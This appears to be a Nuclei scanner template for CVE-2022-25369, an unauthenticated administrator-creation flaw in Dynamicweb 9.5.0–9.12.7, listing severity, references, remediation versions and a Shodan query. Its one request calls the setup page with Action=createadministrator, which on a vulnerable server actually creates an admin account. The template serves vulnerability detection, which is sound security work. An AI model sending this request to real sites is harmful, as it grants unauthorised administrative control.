id: CVE-2022-25369 info: name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation author: pdteam severity: critical description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user. reference: - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25369 cwe-id: CWE-425 remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.' metadata: shodan-query: http.component:"Dynamicweb" tags: cve,cve2022,dynamicweb,rce,unauth http: - method: GET path: - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test" matchers-condition: and matchers: - type: word part: body words: - '"Success": true' - '"Success":true' condition: or - type: word part: header words: - 'application/json' - 'ASP.NET_SessionId' condition: and case-insensitive: true - type: status status: - 200 # Enhanced by cs on 2022/02/28